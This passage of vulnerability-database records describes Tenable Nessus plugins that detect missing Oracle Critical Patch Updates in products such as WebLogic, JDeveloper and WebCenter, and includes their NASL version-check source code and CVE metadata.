'12.2.1.3.180116', 'patch': '26796833', 'bundle': '26796833'}\n];\n\nvcf::oracle_bi_publisher::check_version_and_report(app_info: app_info, constraints:constraints, severity:SECURITY_WARNING);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-10-19T14:22:59", "description": "The version of Oracle WebCenter Portal installed on the remote host is missing a security patch from the January 2018 Critical Patch Update (CPU). It is, therefore, affected by multiple vulnerabilities.\n\n - A vulnerability in the PeopleSoft Enterprise HCM Human Resources component of Oracle PeopleSoft Products (subcomponent: Install (Bouncy Castle Java package)).\n Supported versions that are affected are 9.1 and 9.2.\n An unauthenticated attacker with network access via HTTP can exploit the vulnerability to compromise PeopleSoft Enterprise HCM Human Resources.\n A successful attacks of this vulnerability can result in unauthorized read access to a subset of PeopleSoft Enterprise HCM Human Resources accessible data.\n (CVE-2015-7940)\n\n - A vulnerability in the Oracle WebCenter Portal component of Oracle Fusion Middleware (subcomponent: Security Framework (Apache Struts 1)). Supported versions that are affected are 11.1.1.9.0, 12.2.1.2.0 and 12.2.1.3.0. An unauthenticated attacker with network access via HTTP can exploit the vulnerability to compromise Oracle WebCenter Portal. A successful attacks of this vulnerability can result in a complete Denial-of-Service of Oracle WebCenter Portal including the update, insert or delete access to some of Oracle Web Portal accessible data. (CVE-2016-1182)\n\n - A vulnerability in the Oracle WebCenter Portal component of Oracle Fusion Middleware (subcomponent: WebCenter Spaces Application). Supported versions that are affected are 11.1.1.9.0, 12.2.1.2.0 and 12.2.1.3.0. An unauthenticated attacker with network access via HTTP can exploit the vulnerability to compromise Oracle WebCenter Portal.\n A successful attack require humans interaction to be effective and can result in unauthorized creation, deletion or modification access to Oracle WebCenter Portal data.\n (CVE-2018-2713)", "cvss3": {}, "published": "2018-02-12T00:00:00", "type": "nessus", "title": "Oracle WebCenter Portal Multiple Vulnerabilities (January 2018 CPU)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-7940", "CVE-2016-1182", "CVE-2018-2713"], "modified": "2023-10-18T00:00:00", "cpe": ["cpe:/a:oracle:fusion_middleware"], "id": "ORACLE_WEBCENTER_PORTAL_CPU_JAN_2018.NBIN", "href": "https://www.tenable.com/plugins/nessus/106759", "sourceData": "Binary data oracle_webcenter_portal_cpu_jan_2018.nbin", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-12-07T16:34:46", "description": "The version of Oracle JDeveloper installed on the remote host is missing a security patch. Please see the vendor advisory for additional information.", "cvss3": {}, "published": "2018-02-20T00:00:00", "type": "nessus", "title": "Oracle JDeveloper Multiple Vulnerabilities (January 2018 CPU)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-10273", "CVE-2018-2711"], "modified": "2022-04-11T00:00:00", "cpe": ["cpe:/a:oracle:fusion_middleware", "cpe:/a:oracle:jdeveloper"], "id": "ORACLE_JDEVELOPER_CPU_JAN_2018.NASL", "href": "https://www.tenable.com/plugins/nessus/106903", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(106903);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-2017-10273\", \"CVE-2018-2711\");\n script_bugtraq_id(102539, 102569);\n\n script_name(english:\"Oracle JDeveloper Multiple Vulnerabilities (January 2018 CPU)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A software development application installed on the remote host is\naffected by a vulnerability which allows restricted path traversal \ndue to improperly sanitized input as well as allowing the attacker\naccess to partially modify data\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Oracle JDeveloper installed on the remote host is\nmissing a security patch. Please see the vendor advisory for \nadditional information.\");\n # https://www.oracle.com/technetwork/security-advisory/cpujan2018-3236628.html#AppendixFMW\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?6072c657\");\n # https://support.oracle.com/epmos/faces/DocumentDisplay?_afrLoop=398463191708425&id=2325393.1&_afrWindowMode=0&_adf.ctrl-state=13jjrzsqze_249\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?2edd68c9\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply the appropriate patch according to the January 2018 Oracle\nCritical Patch Update advisory.\");\n script_set_attribute(attribute:\"agent\", value:\"all\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2018-2711\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/01/16\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/01/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/02/20\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:oracle:fusion_middleware\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:oracle:jdeveloper\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"oracle_jdeveloper_installed.nbin\");\n script_require_keys(\"installed_sw/Oracle JDeveloper\");\n\n exit(0);\n}\n\ninclude('vcf_extras_oracle.inc');\n\nvar app_info = vcf::oracle_jdev::get_app_info();\n\nvar constraints = [\n { 'min_version':'11.1.1.7', 'fixed_version':'11.1.1.7.171220', 'missing_patch':'27251436' },\n { 'min_version':'11.1.1.9', 'fixed_version':'11.1.1.9.171117', 'missing_patch':'27120730' },\n { 'min_version':'11.1.2.4', 'fixed_version':'11.1.2.4.171206', 'missing_patch':'27213077' },\n { 'min_version':'12.1.3.0', 'fixed_version':'12.1.3.0.171218', 'missing_patch':'27131743' },\n { 'min_version':'12.2.1.2', 'fixed_version':'12.2.1.2.171017', 'missing_patch':'26752344' }\n];\n\nvcf::oracle_jdev::check_version_and_report(\n app_info:app_info,\n severity:SECURITY_WARNING,\n constraints:constraints\n);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-12-07T16:31:23", "description": "The remote host is missing the January 2018 Critical Patch Update for Oracle Identity Manager. It is, therefore, affected by multiple vulnerabilities as described in the January 2018 critical patch update advisory.", "cvss3": {}, "published": "2018-01-18T00:00:00", "type": "nessus", "title": "Oracle Identity Manager Multiple Vulnerabilities (January 2018 CPU)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-7501", "CVE-2016-0635"], "modified": "2022-04-11T00:00:00", "cpe": ["cpe:/a:oracle:identity_manager"], "id": "ORACLE_IDENTITY_MANAGEMENT_CPU_JAN_2018.NASL", "href": "https://www.tenable.com/plugins/nessus/106140", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(106140);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-2015-7501\", \"CVE-2016-0635\");\n script_bugtraq_id(78215, 91869);\n\n script_name(english:\"Oracle Identity Manager Multiple Vulnerabilities (January 2018 CPU)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"An application installed on the remote host is affected multiple\nvulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote host is missing the January 2018 Critical Patch Update for\nOracle Identity Manager. It is, therefore, affected by multiple\nvulnerabilities as described in the January 2018 critical patch\nupdate advisory.\");\n # https://www.oracle.com/technetwork/security-advisory/cpujan2018-3236628.html#AppendixFMW\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?6072c657\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply the appropriate patch according to the January 2018 Oracle\nCritical Patch Update advisory.\");\n script_set_attribute(attribute:\"agent\", value:\"all\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/11/18\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/01/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/01/18\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:oracle:identity_manager\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2022 Tenable Network Security, Inc.\");\n\n script_dependencies(\"oracle_identity_management_installed.nbin\");\n script_require_keys(\"installed_sw/Oracle Identity Manager\");\n\n exit(0);\n}\n\ninclude(\"global_settings.inc\");\ninclude(\"oracle_rdbms_cpu_func.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"install_func.inc\");\n\nproduct = \"Oracle Identity Manager\";\ninstall = get_single_install(app_name:product, exit_if_unknown_ver:TRUE);\n\nversion = install['version'];\npath = install['path'];\n\nfixed = NULL;\nreport = NULL;\n\nif (version =~ \"^11\\.1\\.2\\.3(\\.|$)\")\n fixed = '11.1.2.3.180111';\n\nif (!isnull(fixed))\n{\n if (ver_compare(ver:version, fix:fixed, strict:FALSE) < 0)\n {\n report =\n '\\n Path : ' + path +\n '\\n Installed version : ' + version +\n '\\n Fixed version : ' + fixed +\n '\\n';\n }\n}\n\nif (isnull(report)) audit(AUDIT_INST_PATH_NOT_VULN, product, version, path);\n\nsecurity_report_v4(port:0, extra:report, severity:SECURITY_HOLE);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T15:26:00", "description": "The version of WebLogic Server installed on the remote host is affected by multiple vulnerabilities as referenced in the January 2018 CPU advisory, as follows:\n\n - Vulnerability in the Oracle WebLogic Server component of Oracle Fusion Middleware (subcomponent: WLS - Web Services). The supported version that is affected are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.1.0, 12.2.1.2.0 and 12.2.1.3.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle WebLogic Server. While the vulnerability is in Oracle WebLogic Server, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of Oracle WebLogic Server as well as unauthorized update, insert or delete access to some of Oracle WebLogic Server accessible data and unauthorized read access to a subset of Oracle WebLogic Server accessible data.\n (CVE-2017-10352)\n\n - Vulnerability in the Oracle WebLogic Server component of Oracle Fusion Middleware (subcomponent: Web Services). Supported versions that are affected are 12.1.3.0.0, 12.2.1.3.0 and 12.2.1.2.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in unauthorized read access to a subset of Oracle WebLogic Server accessible data. (CVE-2018-2625)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2020-12-16T00:00:00", "type": "nessus", "title": "Oracle WebLogic Server Multiple Vulnerabilities (Jan 2018 CPU)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-10352", "CVE-2018-2625"], "modified": "2022-04-11T00:00:00", "cpe": ["cpe:/a:oracle:fusion_middleware", "cpe:/a:oracle:weblogic_server"], "id": "ORACLE_WEBLOGIC_SERVER_CPU_JAN_2018.NASL", "href": "https://www.tenable.com/plugins/nessus/144326", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(144326);\n script_version(\"1.3\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-2017-10352\", \"CVE-2018-2625\");\n\n script_name(english:\"Oracle WebLogic Server Multiple Vulnerabilities (Jan 2018 CPU)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host is affected by multiple vulnerabilities\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of WebLogic Server installed on the remote host is affected by multiple vulnerabilities as referenced in\nthe January 2018 CPU advisory, as follows:\n\n - Vulnerability in the Oracle WebLogic Server component of Oracle Fusion Middleware (subcomponent: WLS - Web\n Services). The supported version that is affected are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.1.0, 12.2.1.2.0 and\n 12.2.1.3.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP\n to compromise Oracle WebLogic Server. While the vulnerability is in Oracle WebLogic Server, attacks may\n significantly impact additional products. Successful attacks of this vulnerability can result in\n unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of Oracle WebLogic\n Server as well as unauthorized update, insert or delete access to some of Oracle WebLogic Server\n accessible data and unauthorized read access to a subset of Oracle WebLogic Server accessible data.\n (CVE-2017-10352)\n\n - Vulnerability in the Oracle WebLogic Server component of Oracle Fusion Middleware (subcomponent: Web\n Services). Supported versions that are affected are 12.1.3.0.0, 12.2.1.3.0 and 12.2.1.2.0. Easily\n exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise\n Oracle WebLogic Server. Successful attacks of this vulnerability can result in unauthorized read access to\n a subset of Oracle WebLogic Server accessible data. (CVE-2018-2625)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.oracle.com/security-alerts/cpujan2018.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply the appropriate patch according to the January 2018 Oracle Critical Patch Update advisory.\");\n script_set_attribute(attribute:\"agent\", value:\"all\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-10352\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/01/18\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/01/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/12/16\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:oracle:fusion_middleware\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:oracle:weblogic_server\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"oracle_weblogic_server_installed.nbin\", \"os_fingerprint.nasl\");\n script_require_keys(\"installed_sw/Oracle WebLogic Server\");\n\n exit(0);\n}\n\ninclude('audit.inc');\ninclude('install_func.inc');\n\napp_name = 'Oracle WebLogic Server';\n\nos = get_kb_item_or_exit('Host/OS');\nif ('windows' >< tolower(os))\n{\n port = get_kb_item('SMB/transport');\n if (!port) port = 445;\n}\nelse port = 0;\n\ninstall = get_single_install(app_name:app_name, exit_if_unknown_ver:TRUE);\nversion = install['version'];\n\nfix = NULL;\nfix_ver = NULL;\n\nif (version =~ \"^12\\.2\\.1\\.3($|[^0-9])\")\n{\n fix_ver = '12.2.1.3.180116';\n fix = make_list('27438258');\n}\nelse if (version =~ \"^12\\.2\\.1\\.2($|[^0-9])\")\n{\n fix_ver = '12.2.1.2.180116';\n fix = make_list('26860993');\n}\nelse if (version =~ \"^12\\.1\\.3\\.\")\n{\n fix_ver = '12.1.3.0.180116';\n fix = make_list('27057030');\n}\n\nif (isnull(fix_ver) || ver_compare(ver:version, fix:fix_ver, strict:FALSE) >= 0)\n audit(AUDIT_INST_PATH_NOT_VULN, app_name, version, install['path']);\n\nelse {\n report =\n '\\n Oracle Home : ' + install['Oracle Home'] +\n '\\n Install path : ' + install['path'] +\n '\\n Version : ' + version +\n '\\n Fixes : ' + join(sep:', ', fix);\n security_report_v4(extra:report, severity:SECURITY_HOLE, port:port);\n}\n\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-08-30T16:33:11", "description": "The version of Oracle Enterprise Manager Cloud Control installed on the remote host is affected by multiple vulnerabilities in the Enterprise Manager Base Platform component.", "cvss3": {}, "published": "2018-07-20T00:00:00", "type": "nessus", "title": "Oracle Enterprise Manager Cloud Control Multiple Vulnerabilities (July 2018 CPU)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-5645", "CVE-2017-9798"], "modified": "2022-04-11T00:00:00", "cpe": ["cpe:/a:oracle:enterprise_manager"], "id": "ORACLE_ENTERPRISE_MANAGER_JUL_2018_CPU.NASL", "href": "https://www.tenable.com/plugins/nessus/111152", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(111152);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-2017-5645\", \"CVE-2017-9798\");\n script_bugtraq_id(97702, 100872);\n script_xref(name:\"IAVA\", value:\"2020-A-0326\");\n\n script_name(english:\"Oracle Enterprise Manager Cloud Control Multiple Vulnerabilities (July 2018 CPU)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"An enterprise management application installed on the remote host is\naffected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Oracle Enterprise Manager Cloud Control installed on\nthe remote host is affected by multiple vulnerabilities in the\nEnterprise Manager Base Platform component.\");\n # https://support.oracle.com/rs?type=doc&id=2394520.1\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?19cc26a6\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply the appropriate patch according to the July 2018 Oracle Critical\nPatch Update advisory.\");\n script_set_attribute(attribute:\"agent\", value:\"all\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-5645\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/07/17\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/07/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/07/20\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:oracle:enterprise_manager\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"oracle_enterprise_manager_installed.nbin\");\n script_require_keys(\"installed_sw/Oracle Enterprise Manager Cloud Control\");\n\n exit(0);\n}\n\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"oracle_rdbms_cpu_func.inc\");\ninclude(\"install_func.inc\");\n\nproduct = \"Oracle Enterprise Manager Cloud Control\";\ninstall = get_single_install(app_name:product, exit_if_unknown_ver:TRUE);\nversion = install['version'];\nemchome = install['path'];\n\npatchid = NULL;\nmissing = NULL;\npatched = FALSE;\nfix = NULL;\n\nif (version =~ \"^13\\.2\\.0\\.0(\\.[0-9]+)?$\")\n{\n patchid = \"28161815\";\n fix = \"13.2.0.0.180717\";\n}\nelse if (version =~ \"^12\\.1\\.0\\.5(\\.[0-9]+)?$\")\n{\n patchid = \"28026487\";\n fix = \"12.1.0.5.180717\";\n}\n\nif (isnull(patchid))\n audit(AUDIT_HOST_NOT, 'affected');\n\n# compare version to check if we've already adjusted for patch level during detection\nif (ver_compare(ver:version, fix:fix, strict:FALSE) >= 0)\n audit(AUDIT_INST_PATH_NOT_VULN, product, version, emchome);\n\n# Now look for the affected components\npatchesinstalled = find_patches_in_ohomes(ohomes:make_list(emchome));\nif (isnull(patchesinstalled))\n missing = patchid;\nelse\n{\n foreach applied (keys(patchesinstalled[emchome]))\n {\n if (applied == patchid)\n {\n patched = TRUE;\n break;\n }\n else\n {\n foreach bugid (patchesinstalled[emchome][applied]['bugs'])\n {\n if (bugid == patchid)\n {\n patched = TRUE;\n break;\n }\n }\n if (patched) break;\n }\n }\n if (!patched)\n missing = patchid;\n}\n\nif (empty_or_null(missing))\n audit(AUDIT_HOST_NOT, 'affected');\n\norder = make_list('Product', 'Version', \"Missing patch\");\nreport = make_array(\n order[0], product,\n order[1], version,\n order[2], patchid\n);\nreport = report_items_str(report_items:report, ordered_fields:order);\n\nsecurity_report_v4(port:0, extra:report, severity:SECURITY_HOLE);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-12-07T16:35:47", "description": "The version of Oracle WebCenter Content running on the remote host is affected by multiple vulnerabilities.", "cvss3": {}, "published": "2018-03-01T00:00:00", "type": "nessus", "title": "Oracle WebCenter Content Multiple Vulnerabilities (January 2018 CPU)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-2564", "CVE-2018-2596", "CVE-2018-2716"], "modified": "2022-04-11T00:00:00", "cpe": ["cpe:/a:oracle:fusion_middleware"], "id": "ORACLE_WEBCENTER_CONTENT_JAN_2018_CPU.NASL", "href": "https://www.tenable.com/plugins/nessus/107090", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(107090);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-2018-2564\", \"CVE-2018-2596\", \"CVE-2018-2716\");\n script_bugtraq_id(102541, 102545, 102672);\n\n script_name(english:\"Oracle WebCenter Content Multiple Vulnerabilities (January 2018 CPU)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"An application running on the remote host is affected by\nmultiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Oracle WebCenter Content running on the remote host is\naffected by multiple vulnerabilities.\");\n # https://www.oracle.com/technetwork/security-advisory/cpujan2018-3236628.html#AppendixFMW\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?6072c657\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply the appropriate patch according to the January 2018 Oracle\nCritical Patch Update advisory.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No exploit is required\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/01/16\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/01/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/03/01\");\n\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:oracle:fusion_middleware\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2022 Tenable Network Security, Inc.\");\n\n script_dependencies(\"oracle_webcenter_content_detect.nasl\");\n script_require_keys(\"installed_sw/Oracle WebCenter Content\", \"Settings/ParanoidReport\");\n script_exclude_keys(\"Settings/disable_cgi_scanning\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"webapp_func.inc\");\n\nappname = \"Oracle WebCenter Content\";\n\nif (report_paranoia < 2) audit(AUDIT_PARANOID);\n\nget_install_count(app_name:appname, exit_if_zero:TRUE);\n\nport = get_http_port(default:80);\n\ninstall = get_single_install(app_name:appname, port:port, exit_if_unknown_ver:TRUE);\n\nversion = install['version'];\ndir = install['path'];\n\ninstall_url = build_url(port: port, qs:dir);\n\nmatches = pregmatch(string:version, pattern:\"([0-9.]+) \$([0-9.]+)\$\");\nif (empty_or_null(matches)) audit(AUDIT_VER_FORMAT, version);\nmain_ver = matches[1];\nsub_ver = matches[2];\nbuild = int(sub_ver);\nfixed_build = 0;\n\nreport = '';\n\nif (main_ver == \"12.2.1.3.0\")\n{\n # Patch 27042584\n # 12.2.1.3.0 (158565)\n fixed_build = 158565;;\n patch = 27042584;\n}\nelse if (main_ver == \"12.2.1.2.0\")\n{\n # Patch 27116621\n # 12.2.1.2.0 (158156)\n fixed_build = 158156;\n patch = 27116621;\n}\nelse if (main_ver == \"11.1.1.9.0\")\n{\n # Patch 27042562\n # 11.1.1.9.0 (171120)\n fixed_build = 171120;\n patch = 27042562;\n}\nif (build < fixed_build)\n{\n report = '\\n Installed version : ' + main_ver + ' (' + sub_ver + ')' +\n '\\n Fixed version : ' + main_ver + ' (' + fixed_build + ')' +\n '\\n Required patch : ' + patch + '\\n';\n}\n\nif (report == '') audit(AUDIT_WEB_APP_NOT_AFFECTED, appname, install_url, version);\nelse security_report_v4(port:port, extra:report, severity:SECURITY_WARNING);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-19T14:22:06", "description": "The version of Oracle JDeveloper installed on the remote host is missing a security patch. Please see the vendor advisory for additional information.", "cvss3": {}, "published": "2018-07-25T00:00:00", "type": "nessus", "title": "Oracle JDeveloper Information Disclosure Vulnerability (July 2018 CPU)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-7940"], "modified": "2022-04-11T00:00:00", "cpe": ["cpe:/a:oracle:fusion_middleware", "cpe:/a:oracle:jdeveloper"], "id": "ORACLE_JDEVELOPER_CPU_JUL_2018.NASL", "href": "https://www.tenable.com/plugins/nessus/111332", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(111332);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-2015-7940\");\n script_bugtraq_id(79091);\n\n script_name(english:\"Oracle JDeveloper Information Disclosure Vulnerability (July 2018 CPU)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A software development application installed on the remote host is\naffected by an information disclosure vulnerability within the Bouncy\nCastle Java package\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Oracle JDeveloper installed on the remote host is\nmissing a security patch. Please see the vendor advisory for \nadditional information.\");\n # https://www.oracle.com/technetwork/security-advisory/cpujul2018-4258247.html#AppendixFMW\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?60bcb092\");\n # https://support.oracle.com/rs?type=doc&id=2394520.1\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?19cc26a6\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply the appropriate patch according to the January 2018 Oracle\nCritical Patch Update advisory.\");\n script_set_attribute(attribute:\"agent\", value:\"all\");\n 